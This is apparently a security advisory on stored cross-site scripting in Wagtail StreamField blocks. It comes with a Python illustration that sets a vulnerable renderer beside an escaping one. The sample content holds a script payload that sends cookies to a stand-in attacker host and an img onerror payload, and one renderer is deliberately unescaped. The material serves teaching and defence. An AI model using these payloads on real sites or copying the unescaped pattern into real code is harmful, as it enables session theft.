Wagtail is vulnerable to cross-site scripting. Lack of proper escaping of HTML in Wagtail StreamField blocks (CharBlock, TextBlock, or a similar user-defined block derived from FieldBlock) allows a user with the ability to author StreamField content to inject and execute arbitrary JavaScript in the browser of any user who views the rendered page.
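The failure mode described above, recreated as a stand-alone Python illustration. This is an added example, not Wagtail's code, and it does not reproduce Wagtail's template machinery: the block types, the per-block templates, the editor content and the assumption that only the "paragraph" block carries already-sanitised HTML are all constructed for the example. It contrasts a renderer that interpolates plain-text block values as if they were HTML with one that escapes them on output, and includes a crude check for active content in the rendered result.

```python
# Added illustration (not Wagtail's code): a plain-text StreamField-style
# block whose value is not HTML-escaped on output becomes a stored XSS sink.
import re
from html import escape

# Constructed sample of saved StreamField-like content, as an editor with
# authoring rights might submit it. Each entry is (block_type, value).
# "heading" stands in for a plain-text block (CharBlock/TextBlock); its value
# is raw text. "paragraph" stands in for a rich-text block whose HTML is
# assumed (for this example) to have been sanitised on input.
EDITOR_CONTENT = [
    ("heading", "Quarterly report <script>document.location="
                "'https://attacker.example/?c='+document.cookie</script>"),
    ("paragraph", "<p>Revenue grew by <b>12%</b>.</p>"),
    ("heading", 'Notes "and" <img src=x onerror=alert(1)>'),
]

# Block types whose values are trusted HTML (assumption for the example).
# Everything else is plain text and must be escaped when rendered.
HTML_BLOCK_TYPES = {"paragraph"}

# Hypothetical per-block templates; {} is where the block value is inserted.
TEMPLATES = {
    "heading": "<h2>{}</h2>",
    "paragraph": '<div class="rich-text">{}</div>',
}


def render_vulnerable(stream):
    """Interpolate every block value as-is, so a plain-text block's value is
    emitted as HTML. This is the pattern the advisory describes."""
    return "\n".join(TEMPLATES[btype].format(value) for btype, value in stream)


def render_fixed(stream):
    """Escape plain-text block values at output time; trusted HTML blocks are
    passed through unchanged. quote=True also escapes " and ' so the same
    value is safe inside an attribute context."""
    parts = []
    for btype, value in stream:
        if btype not in HTML_BLOCK_TYPES:
            value = escape(value, quote=True)
        parts.append(TEMPLATES[btype].format(value))
    return "\n".join(parts)


# Matches a literal <script tag or any tag carrying an on* event attribute.
# Escaped output contains &lt; rather than <, so it cannot match.
ACTIVE_CONTENT = re.compile(r"<\s*script\b|<[^>]*\son[a-z]+\s*=", re.IGNORECASE)


def contains_active_content(rendered):
    """Crude check used only to show the difference between the two renderers;
    it is not a substitute for a real HTML sanitiser or CSP."""
    return ACTIVE_CONTENT.search(rendered) is not None


if __name__ == "__main__":
    print("vulnerable:", contains_active_content(render_vulnerable(EDITOR_CONTENT)))
    print("fixed:     ", contains_active_content(render_fixed(EDITOR_CONTENT)))
    print(render_fixed(EDITOR_CONTENT))
```

The check belongs at output, not input: a plain-text block may legitimately contain `<` or `&`, so rejecting such characters on save would break real content, and input-side validation can be bypassed by anyone who can write to the content store. In a Django-based project the equivalent mistake is marking a plain-text value as safe (or otherwise bypassing template autoescaping) before it reaches the template; the remediation is to leave it as an ordinary string so it is escaped, and to run a release of Wagtail in which this issue is fixed.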